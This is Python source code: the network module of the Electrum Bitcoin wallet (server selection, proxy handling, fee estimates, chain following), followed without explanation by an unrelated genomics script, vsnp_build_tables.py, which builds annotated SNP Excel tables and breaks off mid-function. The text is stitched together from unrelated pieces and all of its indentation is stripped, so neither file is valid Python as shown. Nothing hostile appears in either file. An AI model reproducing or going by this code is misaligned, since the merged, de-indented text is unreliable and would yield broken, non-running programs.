# Copyright (c) 2011-2016 Thomas Voegtlin
#
# Permission is hereby granted, free of charge, to any person
# obtaining a copy of this software and associated documentation files
# (the "Software"), to deal in the Software without restriction,
# including without limitation the rights to use, copy, modify, merge,
# publish, distribute, sublicense, and/or sell copies of the Software,
# and to permit persons to whom the Software is furnished to do so,
# subject to the following conditions:
#
# The above copyright notice and this permission notice shall be
# included in all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND,
# EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF
# MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND
# NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS
# BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN
# ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN
# CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
# SOFTWARE.
import time
import queue
import os
import random
import re
from collections import defaultdict
import threading
import socket
import json
import sys
import ipaddress
import asyncio
from typing import NamedTuple, Optional
import dns
import dns.resolver
from aiorpcx import TaskGroup
from . import util
from .util import PrintError, print_error, aiosafe, bfh
from .bitcoin import COIN
from . import constants
from . import blockchain
from .interface import Interface, serialize_server, deserialize_server
from .version import PROTOCOL_VERSION
from .simple_config import SimpleConfig
NODES_RETRY_INTERVAL = 60
SERVER_RETRY_INTERVAL = 10
def parse_servers(result):
""" parse servers list into dict format"""
servers = {}
for item in result:
host = item[1]
out = {}
version = None
pruning_level = '-'
if len(item) > 2:
for v in item[2]:
if re.match("[st]\d*", v):
protocol, port = v[0], v[1:]
if port == '': port = constants.net.DEFAULT_PORTS[protocol]
out[protocol] = port
elif re.match("v(.?)+", v):
version = v[1:]
elif re.match("p\d*", v):
pruning_level = v[1:]
if pruning_level == '': pruning_level = '0'
if out:
out['pruning'] = pruning_level
out['version'] = version
servers[host] = out
return servers
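# Illustrative call (made-up values; the input format is what the
# 'server.peers.subscribe' RPC returns: [ip, hostname, [feature, ...]]):
#   parse_servers([['192.0.2.1', 'example.org', ['v1.2', 's50002', 't50001', 'p10000']]])
#   -> {'example.org': {'s': '50002', 't': '50001', 'pruning': '10000', 'version': '1.2'}}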
def filter_version(servers):
def is_recent(version):
try:
return util.versiontuple(version) >= util.versiontuple(PROTOCOL_VERSION)
except Exception as e:
return False
return {k: v for k, v in servers.items() if is_recent(v.get('version'))}
def filter_noonion(servers):
return {k: v for k, v in servers.items() if not k.endswith('.onion')}
def filter_protocol(hostmap, protocol='s'):
'''Filters the hostmap for those implementing protocol.
The result is a list in serialized form.'''
eligible = []
for host, portmap in hostmap.items():
port = portmap.get(protocol)
if port:
eligible.append(serialize_server(host, port, protocol))
return eligible
def pick_random_server(hostmap = None, protocol = 's', exclude_set = set()):
if hostmap is None:
hostmap = constants.net.DEFAULT_SERVERS
eligible = list(set(filter_protocol(hostmap, protocol)) - exclude_set)
return random.choice(eligible) if eligible else None
NetworkParameters = NamedTuple("NetworkParameters", [("host", str),
("port", str),
("protocol", str),
("proxy", Optional[dict]),
("auto_connect", bool)])
proxy_modes = ['socks4', 'socks5']
def serialize_proxy(p):
if not isinstance(p, dict):
return None
return ':'.join([p.get('mode'), p.get('host'), p.get('port'),
p.get('user', ''), p.get('password', '')])
def deserialize_proxy(s: str) -> Optional[dict]:
if not isinstance(s, str):
return None
if s.lower() == 'none':
return None
proxy = { "mode":"socks5", "host":"localhost" }
# FIXME raw IPv6 address fails here
args = s.split(':')
n = 0
if proxy_modes.count(args[n]) == 1:
proxy["mode"] = args[n]
n += 1
if len(args) > n:
proxy["host"] = args[n]
n += 1
if len(args) > n:
proxy["port"] = args[n]
n += 1
else:
proxy["port"] = "8080" if proxy["mode"] == "http" else "1080"
if len(args) > n:
proxy["user"] = args[n]
n += 1
if len(args) > n:
proxy["password"] = args[n]
return proxy
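# Illustrative round trip (made-up values):
#   deserialize_proxy('socks5:127.0.0.1:9050')
#   -> {'mode': 'socks5', 'host': '127.0.0.1', 'port': '9050'}
#   serialize_proxy(deserialize_proxy('socks5:127.0.0.1:9050:user:pw'))
#   -> 'socks5:127.0.0.1:9050:user:pw'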
INSTANCE = None
class Network(PrintError):
"""The Network class manages a set of connections to remote electrum
servers; each connected socket is handled by an Interface() object.
Connections are initiated by a Connection() thread which stops once
the connection succeeds or fails.
Our external API:
- Member functions get_header(), get_interfaces(), get_local_height(),
get_parameters(), get_server_height(), get_status_value(),
is_connected(), set_parameters(), stop()
"""
verbosity_filter = 'n'
def __init__(self, config=None):
global INSTANCE
INSTANCE = self
if config is None:
config = {} # Do not use mutables as default values!
self.config = SimpleConfig(config) if isinstance(config, dict) else config
self.num_server = 10 if not self.config.get('oneserver') else 0
blockchain.blockchains = blockchain.read_blockchains(self.config)
self.print_error("blockchains", list(blockchain.blockchains.keys()))
self.blockchain_index = config.get('blockchain_index', 0)
if self.blockchain_index not in blockchain.blockchains.keys():
self.blockchain_index = 0
# Server for addresses and transactions
self.default_server = self.config.get('server', None)
# Sanitize default server
if self.default_server:
try:
deserialize_server(self.default_server)
except:
self.print_error('Warning: failed to parse server-string; falling back to random.')
self.default_server = None
if not self.default_server:
self.default_server = pick_random_server()
# locks: if you need to take multiple ones, acquire them in the order they are defined here!
self.bhi_lock = asyncio.Lock()
self.interface_lock = threading.RLock() # <- re-entrant
self.callback_lock = threading.Lock()
self.recent_servers_lock = threading.RLock() # <- re-entrant
self.server_peers = {} # returned by interface (servers that the main interface knows about)
self.recent_servers = self.read_recent_servers() # note: needs self.recent_servers_lock
self.banner = ''
self.donation_address = ''
self.relay_fee = None
# callbacks set by the GUI
self.callbacks = defaultdict(list) # note: needs self.callback_lock
dir_path = os.path.join(self.config.path, 'certs')
util.make_dir(dir_path)
# retry times
self.server_retry_time = time.time()
self.nodes_retry_time = time.time()
# kick off the network. interface is the main server we are currently
# communicating with. interfaces is the set of servers we are connecting
# to or have an ongoing connection with
self.interface = None # note: needs self.interface_lock
self.interfaces = {} # note: needs self.interface_lock
self.auto_connect = self.config.get('auto_connect', True)
self.connecting = set()
self.server_queue = None
self.server_queue_group = None
self.asyncio_loop = asyncio.get_event_loop()
self.start_network(deserialize_server(self.default_server)[2],
deserialize_proxy(self.config.get('proxy')))
@staticmethod
def get_instance():
return INSTANCE
def with_interface_lock(func):
def func_wrapper(self, *args, **kwargs):
with self.interface_lock:
return func(self, *args, **kwargs)
return func_wrapper
def with_recent_servers_lock(func):
def func_wrapper(self, *args, **kwargs):
with self.recent_servers_lock:
return func(self, *args, **kwargs)
return func_wrapper
def register_callback(self, callback, events):
with self.callback_lock:
for event in events:
self.callbacks[event].append(callback)
def unregister_callback(self, callback):
with self.callback_lock:
for callbacks in self.callbacks.values():
if callback in callbacks:
callbacks.remove(callback)
def trigger_callback(self, event, *args):
with self.callback_lock:
callbacks = self.callbacks[event][:]
for callback in callbacks:
if asyncio.iscoroutinefunction(callback):
# FIXME: if callback throws, we will lose the traceback
asyncio.run_coroutine_threadsafe(callback(event, *args), self.asyncio_loop)
else:
callback(event, *args)
def read_recent_servers(self):
if not self.config.path:
return []
path = os.path.join(self.config.path, "recent_servers")
try:
with open(path, "r", encoding='utf-8') as f:
data = f.read()
return json.loads(data)
except:
return []
@with_recent_servers_lock
def save_recent_servers(self):
if not self.config.path:
return
path = os.path.join(self.config.path, "recent_servers")
s = json.dumps(self.recent_servers, indent=4, sort_keys=True)
try:
with open(path, "w", encoding='utf-8') as f:
f.write(s)
except:
pass
@with_interface_lock
def get_server_height(self):
return self.interface.tip if self.interface else 0
def server_is_lagging(self):
sh = self.get_server_height()
if not sh:
self.print_error('no height for main interface')
return True
lh = self.get_local_height()
result = (lh - sh) > 1
if result:
self.print_error('%s is lagging (%d vs %d)' % (self.default_server, sh, lh))
return result
def set_status(self, status):
self.connection_status = status
self.notify('status')
def is_connected(self):
return self.interface is not None and self.interface.ready.done()
def is_connecting(self):
return self.connection_status == 'connecting'
async def request_server_info(self, interface):
await interface.ready
session = interface.session
async def get_banner():
self.banner = await session.send_request('server.banner')
self.notify('banner')
async def get_donation_address():
self.donation_address = await session.send_request('server.donation_address')
async def get_server_peers():
self.server_peers = parse_servers(await session.send_request('server.peers.subscribe'))
self.notify('servers')
async def get_relay_fee():
relayfee = await session.send_request('blockchain.relayfee')
if relayfee is None:
self.relay_fee = None
else:
relayfee = int(relayfee * COIN)
self.relay_fee = max(0, relayfee)
async with TaskGroup() as group:
await group.spawn(get_banner)
await group.spawn(get_donation_address)
await group.spawn(get_server_peers)
await group.spawn(get_relay_fee)
await group.spawn(self.request_fee_estimates(interface))
async def request_fee_estimates(self, interface):
session = interface.session
from .simple_config import FEE_ETA_TARGETS
self.config.requested_fee_estimates()
async with TaskGroup() as group:
histogram_task = await group.spawn(session.send_request('mempool.get_fee_histogram'))
fee_tasks = []
for i in FEE_ETA_TARGETS:
fee_tasks.append((i, await group.spawn(session.send_request('blockchain.estimatefee', [i]))))
self.config.mempool_fees = histogram = histogram_task.result()
self.print_error('fee_histogram', histogram)
self.notify('fee_histogram')
for i, task in fee_tasks:
fee = int(task.result() * COIN)
self.config.update_fee_estimates(i, fee)
self.print_error("fee_estimates[%d]" % i, fee)
self.notify('fee')
def get_status_value(self, key):
if key == 'status':
value = self.connection_status
elif key == 'banner':
value = self.banner
elif key == 'fee':
value = self.config.fee_estimates
elif key == 'fee_histogram':
value = self.config.mempool_fees
elif key == 'servers':
value = self.get_servers()
else:
raise Exception('unexpected trigger key {}'.format(key))
return value
def notify(self, key):
if key in ['status', 'updated']:
self.trigger_callback(key)
else:
self.trigger_callback(key, self.get_status_value(key))
def get_parameters(self) -> NetworkParameters:
host, port, protocol = deserialize_server(self.default_server)
return NetworkParameters(host, port, protocol, self.proxy, self.auto_connect)
def get_donation_address(self):
if self.is_connected():
return self.donation_address
@with_interface_lock
def get_interfaces(self):
'''The interfaces that are in connected state'''
return list(self.interfaces.keys())
@with_recent_servers_lock
def get_servers(self):
# start with hardcoded servers
out = constants.net.DEFAULT_SERVERS
# add recent servers
for s in self.recent_servers:
try:
host, port, protocol = deserialize_server(s)
except:
continue
if host not in out:
out[host] = {protocol: port}
# add servers received from main interface
if self.server_peers:
out.update(filter_version(self.server_peers.copy()))
# potentially filter out some
if self.config.get('noonion'):
out = filter_noonion(out)
return out
@with_interface_lock
def start_interface(self, server):
if server not in self.interfaces and server not in self.connecting:
if server == self.default_server:
self.print_error("connecting to %s as new interface" % server)
self.set_status('connecting')
self.connecting.add(server)
self.server_queue.put(server)
def start_random_interface(self):
with self.interface_lock:
exclude_set = self.disconnected_servers.union(set(self.interfaces))
server = pick_random_server(self.get_servers(), self.protocol, exclude_set)
if server:
self.start_interface(server)
return server
def set_proxy(self, proxy: Optional[dict]):
self.proxy = proxy
# Store these somewhere so we can un-monkey-patch
if not hasattr(socket, "_getaddrinfo"):
socket._getaddrinfo = socket.getaddrinfo
if proxy:
self.print_error('setting proxy', proxy)
# prevent dns leaks, see http://stackoverflow.com/questions/13184205/dns-over-proxy
socket.getaddrinfo = lambda *args: [(socket.AF_INET, socket.SOCK_STREAM, 6, '', (args[0], args[1]))]
else:
if sys.platform == 'win32':
# On Windows, socket.getaddrinfo takes a mutex, and might hold it for up to 10 seconds
# when dns-resolving. To speed it up drastically, we resolve dns ourselves, outside that lock.
# see #4421
socket.getaddrinfo = self._fast_getaddrinfo
else:
socket.getaddrinfo = socket._getaddrinfo
self.trigger_callback('proxy_set', self.proxy)
@staticmethod
def _fast_getaddrinfo(host, *args, **kwargs):
def needs_dns_resolving(host2):
try:
ipaddress.ip_address(host2)
return False # already valid IP
except ValueError:
pass # not an IP
if str(host) in ('localhost', 'localhost.',):
return False
return True
try:
if needs_dns_resolving(host):
answers = dns.resolver.query(host)
addr = str(answers[0])
else:
addr = host
except dns.exception.DNSException:
# dns failed for some reason, e.g. dns.resolver.NXDOMAIN
# this is normal. Simply report back failure:
raise socket.gaierror(11001, 'getaddrinfo failed')
except BaseException as e:
# Possibly internal error in dnspython :( see #4483
# Fall back to original socket.getaddrinfo to resolve dns.
print_error('dnspython failed to resolve dns with error:', e)
addr = host
return socket._getaddrinfo(addr, *args, **kwargs)
@with_interface_lock
def start_network(self, protocol: str, proxy: Optional[dict]):
assert not self.interface and not self.interfaces
assert not self.connecting and not self.server_queue
assert not self.server_queue_group
self.print_error('starting network')
self.disconnected_servers = set([]) # note: needs self.interface_lock
self.protocol = protocol
self._init_server_queue()
self.set_proxy(proxy)
self.start_interface(self.default_server)
self.trigger_callback('network_updated')
def _init_server_queue(self):
self.server_queue = queue.Queue()
self.server_queue_group = server_queue_group = TaskGroup()
async def job():
forever = asyncio.Event()
async with server_queue_group as group:
await group.spawn(forever.wait())
asyncio.run_coroutine_threadsafe(job(), self.asyncio_loop)
@with_interface_lock
def stop_network(self):
self.print_error("stopping network")
for interface in list(self.interfaces.values()):
self.close_interface(interface)
if self.interface:
self.close_interface(self.interface)
assert self.interface is None
assert not self.interfaces
self.connecting.clear()
self._stop_server_queue()
self.trigger_callback('network_updated')
def _stop_server_queue(self):
# Get a new queue - no old pending connections thanks!
self.server_queue = None
asyncio.run_coroutine_threadsafe(self.server_queue_group.cancel_remaining(), self.asyncio_loop)
self.server_queue_group = None
def set_parameters(self, net_params: NetworkParameters):
proxy = net_params.proxy
proxy_str = serialize_proxy(proxy)
host, port, protocol = net_params.host, net_params.port, net_params.protocol
server_str = serialize_server(host, port, protocol)
# sanitize parameters
try:
deserialize_server(serialize_server(host, port, protocol))
if proxy:
proxy_modes.index(proxy["mode"]) + 1
int(proxy['port'])
except:
return
self.config.set_key('auto_connect', net_params.auto_connect, False)
self.config.set_key("proxy", proxy_str, False)
self.config.set_key("server", server_str, True)
# abort if changes were not allowed by config
if self.config.get('server') != server_str or self.config.get('proxy') != proxy_str:
return
self.auto_connect = net_params.auto_connect
if self.proxy != proxy or self.protocol != protocol:
# Restart the network defaulting to the given server
with self.interface_lock:
self.stop_network()
self.default_server = server_str
self.start_network(protocol, proxy)
elif self.default_server != server_str:
self.switch_to_interface(server_str)
else:
self.switch_lagging_interface()
def switch_to_random_interface(self):
'''Switch to a random connected server other than the current one'''
servers = self.get_interfaces() # Those in connected state
if self.default_server in servers:
servers.remove(self.default_server)
if servers:
self.switch_to_interface(random.choice(servers))
@with_interface_lock
def switch_lagging_interface(self):
'''If auto_connect and lagging, switch interface'''
if self.server_is_lagging() and self.auto_connect:
# switch to one that has the correct header (not height)
header = self.blockchain().read_header(self.get_local_height())
def filt(x):
a = x[1].tip_header
b = header
assert type(a) is type(b)
return a == b
filtered = list(map(lambda x: x[0], filter(filt, self.interfaces.items())))
if filtered:
choice = random.choice(filtered)
self.switch_to_interface(choice)
@with_interface_lock
def switch_to_interface(self, server):
'''Switch to server as our interface. If no connection exists and none
is being opened, start a thread to connect. The actual switch will
happen on receipt of the connection notification. Do nothing
if server already is our interface.'''
self.default_server = server
if server not in self.interfaces:
self.interface = None
self.start_interface(server)
return
i = self.interfaces[server]
if self.interface != i:
self.print_error("switching to", server)
if self.interface is not None:
# Stop any current interface in order to terminate subscriptions,
# and to cancel tasks in interface.group.
# However, for headers sub, give preference to this interface
# over unknown ones, i.e. start it again right away.
old_server = self.interface.server
self.close_interface(self.interface)
if old_server != server and len(self.interfaces) <= self.num_server:
self.start_interface(old_server)
self.interface = i
asyncio.get_event_loop().create_task(
i.group.spawn(self.request_server_info(i)))
self.trigger_callback('default_server_changed')
self.set_status('connected')
self.trigger_callback('network_updated')
@with_interface_lock
def close_interface(self, interface):
if interface:
if interface.server in self.interfaces:
self.interfaces.pop(interface.server)
if interface.server == self.default_server:
self.interface = None
interface.close()
@with_recent_servers_lock
def add_recent_server(self, server):
# list is ordered
if server in self.recent_servers:
self.recent_servers.remove(server)
self.recent_servers.insert(0, server)
self.recent_servers = self.recent_servers[0:20]
self.save_recent_servers()
@with_interface_lock
def connection_down(self, server):
'''A connection to server either went down, or was never made.
We distinguish by whether it is in self.interfaces.'''
self.disconnected_servers.add(server)
if server == self.default_server:
self.set_status('disconnected')
if server in self.interfaces:
self.close_interface(self.interfaces[server])
self.trigger_callback('network_updated')
@aiosafe
async def new_interface(self, server):
interface = Interface(self, server, self.config.path, self.proxy)
timeout = 10 if not self.proxy else 20
try:
await asyncio.wait_for(interface.ready, timeout)
except BaseException as e:
#import traceback
#traceback.print_exc()
self.print_error(interface.server, "couldn't launch because", str(e), str(type(e)))
# note: connection_down will not call interface.close() as
# interface is not yet in self.interfaces. OTOH, calling
# interface.close() here will sometimes raise deep inside the
# asyncio internal select.select... instead, interface will close
# itself when it detects the cancellation of interface.ready;
# however this might take several seconds...
self.connection_down(interface.server)
return
finally:
try: self.connecting.remove(server)
except KeyError: pass
with self.interface_lock:
self.interfaces[server] = interface
if server == self.default_server:
self.switch_to_interface(server)
self.add_recent_server(server)
self.trigger_callback('network_updated')
def init_headers_file(self):
b = blockchain.blockchains[0]
filename = b.path()
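# Pre-allocate room for all checkpointed headers: each serialized block
# header is 80 bytes and every checkpoint covers a 2016-block chunk.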
length = 80 * len(constants.net.CHECKPOINTS) * 2016
if not os.path.exists(filename) or os.path.getsize(filename) < length:
with open(filename, 'wb') as f:
if length>0:
f.seek(length-1)
f.write(b'\x00')
with b.lock:
b.update_size()
async def get_merkle_for_transaction(self, tx_hash, tx_height):
return await self.interface.session.send_request('blockchain.transaction.get_merkle', [tx_hash, tx_height])
def broadcast_transaction_from_non_network_thread(self, tx, timeout=10):
# note: calling this from the network thread will deadlock it
fut = asyncio.run_coroutine_threadsafe(self.broadcast_transaction(tx, timeout=timeout), self.asyncio_loop)
return fut.result()
async def broadcast_transaction(self, tx, timeout=10):
try:
out = await self.interface.session.send_request('blockchain.transaction.broadcast', [str(tx)], timeout=timeout)
except asyncio.TimeoutError as e:
return False, "error: operation timed out"
except Exception as e:
return False, "error: " + str(e)
if out != tx.txid():
return False, "error: " + out
return True, out
async def request_chunk(self, height, tip=None, *, can_return_early=False):
return await self.interface.request_chunk(height, tip=tip, can_return_early=can_return_early)
@with_interface_lock
def blockchain(self):
if self.interface and self.interface.blockchain is not None:
self.blockchain_index = self.interface.blockchain.forkpoint
return blockchain.blockchains[self.blockchain_index]
@with_interface_lock
def get_blockchains(self):
out = {}
with blockchain.blockchains_lock: blockchain_items = list(blockchain.blockchains.items())
for k, b in blockchain_items:
r = list(filter(lambda i: i.blockchain==b, list(self.interfaces.values())))
if r:
out[k] = r
return out
def follow_chain(self, index):
bc = blockchain.blockchains.get(index)
if bc:
self.blockchain_index = index
self.config.set_key('blockchain_index', index)
with self.interface_lock:
interfaces = list(self.interfaces.values())
for i in interfaces:
if i.blockchain == bc:
self.switch_to_interface(i.server)
break
else:
raise Exception('blockchain not found', index)
with self.interface_lock:
if self.interface:
net_params = self.get_parameters()
host, port, protocol = deserialize_server(self.interface.server)
net_params = net_params._replace(host=host, port=port, protocol=protocol)
self.set_parameters(net_params)
def get_local_height(self):
return self.blockchain().height()
def export_checkpoints(self, path):
# run manually from the console to generate checkpoints
cp = self.blockchain().get_checkpoints()
with open(path, 'w', encoding='utf-8') as f:
f.write(json.dumps(cp, indent=4))
def start(self, fx=None):
self.main_taskgroup = TaskGroup()
async def main():
self.init_headers_file()
async with self.main_taskgroup as group:
await group.spawn(self.maintain_sessions())
if fx: await group.spawn(fx)
self._wrapper_thread = threading.Thread(target=self.asyncio_loop.run_until_complete, args=(main(),))
self._wrapper_thread.start()
def stop(self):
asyncio.run_coroutine_threadsafe(self.main_taskgroup.cancel_remaining(), self.asyncio_loop)
def join(self):
self._wrapper_thread.join(1)
async def maintain_sessions(self):
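# Connection-maintenance loop: drain the server queue into new interfaces,
# reap interfaces whose futures errored, top up random connections, and
# keep the main (default) interface alive.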
while True:
while self.server_queue.qsize() > 0:
server = self.server_queue.get()
await self.server_queue_group.spawn(self.new_interface(server))
remove = []
for k, i in self.interfaces.items():
if i.fut.done() and not i.exception:
assert False, "interface future should not finish without exception"
if i.exception:
if not i.fut.done():
try: i.fut.cancel()
except Exception as e: self.print_error('exception while cancelling fut', e)
try:
raise i.exception
except BaseException as e:
self.print_error(i.server, "errored because:", str(e), str(type(e)))
remove.append(k)
for k in remove:
self.connection_down(k)
# nodes
now = time.time()
for i in range(self.num_server - len(self.interfaces) - len(self.connecting)):
self.start_random_interface()
if now - self.nodes_retry_time > NODES_RETRY_INTERVAL:
self.print_error('network: retrying connections')
self.disconnected_servers = set([])
self.nodes_retry_time = now
# main interface
if not self.is_connected():
if self.auto_connect:
if not self.is_connecting():
self.switch_to_random_interface()
else:
if self.default_server in self.disconnected_servers:
if now - self.server_retry_time > SERVER_RETRY_INTERVAL:
self.disconnected_servers.remove(self.default_server)
self.server_retry_time = now
else:
self.switch_to_interface(self.default_server)
else:
if self.config.is_fee_estimates_update_required():
await self.interface.group.spawn(self.request_fee_estimates(self.interface))
await asyncio.sleep(0.1)
vsnp_build_tables.py
#!/usr/bin/env python
import argparse
import multiprocessing
import os
import queue
import re
import pandas
import pandas.io.formats.excel
from Bio import SeqIO
# The maximum number of columns allowed in a LibreOffice
# spreadsheet is 1024. Excel allows 16,384 columns, but we
# use the lower number as the maximum. Some browsers
# (e.g., Firefox on Linux) are configured to open Excel
# spreadsheets with LibreOffice.
MAXCOLS = 1024
OUTPUT_EXCEL_DIR = 'output_excel_dir'
INPUT_JSON_AVG_MQ_DIR = 'input_json_avg_mq_dir'
INPUT_JSON_DIR = 'input_json_dir'
INPUT_NEWICK_DIR = 'input_newick_dir'
def annotate_table(table_df, group, annotation_dict):
for gbk_chrome, pro in list(annotation_dict.items()):
ref_pos = list(table_df)
ref_series = pandas.Series(ref_pos)
ref_df = pandas.DataFrame(ref_series.str.split(':', expand=True).values, columns=['reference', 'position'])
all_ref = ref_df[ref_df['reference'] == gbk_chrome]
positions = all_ref.position.to_frame()
# Create an annotation file.
annotation_file = "%s_annotations.csv" % group
with open(annotation_file, "a") as fh:
for _, row in positions.iterrows():
pos = row.position
try:
aaa = pro.iloc[pro.index.get_loc(int(pos))][['chrom', 'locus', 'product', 'gene']]
try:
chrom, name, locus, tag = aaa.values[0]
print("{}:{}\t{}, {}, {}".format(chrom, pos, locus, tag, name), file=fh)
except ValueError:
# If only one annotation for the entire
# chromosome (e.g., flu) then having [0] fails
chrom, name, locus, tag = aaa.values
print("{}:{}\t{}, {}, {}".format(chrom, pos, locus, tag, name), file=fh)
except KeyError:
print("{}:{}\tNo annotated product".format(gbk_chrome, pos), file=fh)
# Read the annotation file into a data frame.
annotations_df = pandas.read_csv(annotation_file, sep='\t', header=None, names=['index', 'annotations'], index_col='index')
# Remove the annotation_file from disk since both
# cascade and sort tables are built using the file,
# and it is opened for writing in append mode.
os.remove(annotation_file)
# Process the data.
table_df_transposed = table_df.T
table_df_transposed.index = table_df_transposed.index.rename('index')
table_df_transposed = table_df_transposed.merge(annotations_df, left_index=True, right_index=True)
table_df = table_df_transposed.T
return table_df
def excel_formatter(json_file_name, excel_file_name, group, annotation_dict):
pandas.io.formats.excel.header_style = None
table_df = pandas.read_json(json_file_name, orient='split')
if annotation_dict is not None:
table_df = annotate_table(table_df, group, annotation_dict)
else:
table_df = table_df.append(pandas.Series(name='no annotations'))
writer = pandas.ExcelWriter(excel_file_name, engine='xlsxwriter')
table_df.to_excel(writer, sheet_name='Sheet1')
writer_book = writer.book
ws = writer.sheets['Sheet1']
format_a = writer_book.add_format({'bg_color': '#58FA82'})
format_g = writer_book.add_format({'bg_color': '#F7FE2E'})
format_c = writer_book.add_format({'bg_color': '#0000FF'})
format_t = writer_book.add_format({'bg_color': '#FF0000'})
format_normal = writer_book.add_format({'bg_color': '#FDFEFE'})
formatlowqual = writer_book.add_format({'font_color': '#C70039', 'bg_color': '#E2CFDD'})
format_ambigous = writer_book.add_format({'font_color': '#C70039', 'bg_color': '#E2CFDD'})
format_n = writer_book.add_format({'bg_color': '#E2CFDD'})
rows, cols = table_df.shape
ws.set_column(0, 0, 30)
ws.set_column(1, cols, 2.1)
ws.freeze_panes(2, 1)
format_annotation = writer_book.add_format({'font_color': '#0A028C', 'rotation': '-90', 'align': 'top'})
# Set last row.
ws.set_row(rows + 1, cols + 1, format_annotation)
# Make sure that row/column locations don't overlap.
ws.conditional_format(rows - 2, 1, rows - 1, cols, {'type': 'cell', 'criteria': '<', 'value': 55, 'format': formatlowqual})
ws.conditional_format(2, 1, rows - 2, cols, {'type': 'cell', 'criteria': '==', 'value': 'B$2', 'format': format_normal})
ws.conditional_format(2, 1, rows - 2, cols, {'type': 'text', 'criteria': 'containing', 'value': 'A', 'format': format_a})
ws.conditional_format(2, 1, rows - 2, cols, {'type': 'text', 'criteria': 'containing', 'value': 'G', 'format': format_g})
ws.conditional_format(2, 1, rows - 2, cols, {'type': 'text', 'criteria': 'containing', 'value': 'C', 'format': format_c})
ws.conditional_format(2, 1, rows - 2, cols, {'type': 'text', 'criteria': 'containing', 'value': 'T', 'format': format_t})
ws.conditional_format(2, 1, rows - 2, cols, {'type': 'text', 'criteria': 'containing', 'value': 'S', 'format': format_ambigous})
ws.conditional_format(2, 1, rows - 2, cols, {'type': 'text', 'criteria': 'containing', 'value': 'Y', 'format': format_ambigous})
ws.conditional_format(2, 1, rows - 2, cols, {'type': 'text', 'criteria': 'containing', 'value': 'R', 'format': format_ambigous})
ws.conditional_format(2, 1, rows - 2, cols, {'type': 'text', 'criteria': 'containing', 'value': 'W', 'format': format_ambigous})
ws.conditional_format(2, 1, rows - 2, cols, {'type': 'text', 'criteria': 'containing', 'value': 'K', 'format': format_ambigous})
ws.conditional_format(2, 1, rows - 2, cols, {'type': 'text', 'criteria': 'containing', 'value': 'M', 'format': format_ambigous})
ws.conditional_format(2, 1, rows - 2, cols, {'type': 'text', 'criteria': 'containing', 'value': 'N', 'format': format_n})
ws.conditional_format(2, 1, rows - 2, cols, {'type': 'text', 'criteria': 'containing', 'value': '-', 'format': format_n})
format_rotation = writer_book.add_format({})
format_rotation.set_rotation(90)
for column_num, column_name in enumerate(list(table_df.columns)):
ws.write(0, column_num + 1, column_name, format_rotation)
format_annotation = writer_book.add_format({'font_color': '#0A028C', 'rotation': '-90', 'align': 'top'})
# Set last row.
ws.set_row(rows, 400, format_annotation)
writer.save()
def get_annotation_dict(gbk_file):
gbk_dict = SeqIO.to_dict(SeqIO.parse(gbk_file, "genbank"))
annotation_dict = {}
tmp_file = "features.csv"
# Create a file of chromosomes and features.
for chromosome in list(gbk_dict.keys()):
with open(tmp_file, 'w+') as fh:
for feature in gbk_dict[chromosome].features:
if "CDS" in feature.type or "rRNA" in feature.type:
try:
product = feature.qualifiers['product'][0]
except KeyError:
product = None
try:
locus = feature.qualifiers['locus_tag'][0]
except KeyError:
locus = None
try:
gene = feature.qualifiers['gene'][0]
except KeyError:
gene = None
fh.write("%s\t%d\t%d\t%s\t%s\t%s\n" % (chromosome, int(feature.location.start), int(feature.location.end), locus, product, gene))
# Read the chromosomes and features file into a data frame.
df = pandas.read_csv(tmp_file, sep='\t', names=["chrom", "start", "stop", "locus", "product", "gene"])
# Process the data.
df = df.sort_values(['start', 'gene'], ascending=[True, False])
df = df.drop_duplicates('start')
pro = df.reset_index(drop=True)
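# Index the features by [start, stop] intervals (closed on both ends) so
# that annotate_table() can look up a SNP position with pro.index.get_loc(pos).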
pro.index = pandas.IntervalIndex.from_arrays(pro['start'], pro['stop'], closed='both')
annotation_dict[chromosome] = pro
return annotation_dict
def get_sample_name(file_path):
base_file_name = os.path.basename(file_path)
if base_file_name.find(".") > 0:
# Eliminate the extension.
return os.path.splitext(base_file_name)[0]
return base_file_name
def output_cascade_table(cascade_order, mqdf, group, annotation_dict):
cascade_order_mq = pandas.concat([cascade_order, mqdf], join='inner')
output_table(cascade_order_mq, "cascade", group, annotation_dict)
def output_excel(df, type_str, group, annotation_dict, count=None):
# Output the temporary json file that
# is used by the excel_formatter.
if count is None:
if group is None:
json_file_name = os.path.join(OUTPUT_EXCEL_DIR, "%s_order_mq.json" % type_str)
excel_file_name = os.path.join(OUTPUT_EXCEL_DIR, "%s_table.xlsx" % type_str)
else:
json_file_name = os.path.join(OUTPUT_EXCEL_DIR, "%s_%s_order_mq.json" % (group, type_str))
excel_file_name = os.path.join(OUTPUT_EXCEL_DIR, "%s_%s_table.xlsx" % (group, type_str))
else:
# The table has more columns than is allowed by the
# MAXCOLS setting, so multiple files will be produced
# as an output collection.
if group is None:
json_file_name = os.path.join(OUTPUT_EXCEL_DIR, "%s_order_mq_%d.json" % (type_str, count))
excel_file_name = os.path.join(OUTPUT_EXCEL_DIR, "%s_table_%d.xlsx" % (type_str, count))
else:
json_file_name = os.path.join(OUTPUT_EXCEL_DIR, "%s_%s_order_mq_%d.json" % (group, type_str, count))
excel_file_name = os.path.join(OUTPUT_EXCEL_DIR, "%s_%s_table_%d.xlsx" % (group, type_str, count))
df.to_json(json_file_name, orient='split')
# Output the Excel file.
excel_formatter(json_file_name, excel_file_name, group, annotation_dict)
def output_sort_table(cascade_order, mqdf, group, annotation_dict):
sort_df = cascade_order.T
sort_df['abs_value'] = sort_df.index
sort_df[['chrom', 'pos']] = sort_df['abs_value'].str.split(':', expand=True)
sort_df = sort_df.drop(['abs_value', 'chrom'], axis=1)
sort_df.pos = sort_df.pos.astype(int)
sort_df = sort_df.sort_values(by=['pos'])
sort_df = sort_df.drop(['pos'], axis=1)
sort_df = sort_df.T
sort_order_mq = pandas.concat([sort_df, mqdf], join='inner')
output_table(sort_order_mq, "sort", group, annotation_dict)
def output_table(df, type_str, group, annotation_dict):
if isinstance(group, str) and group.startswith("dataset"):
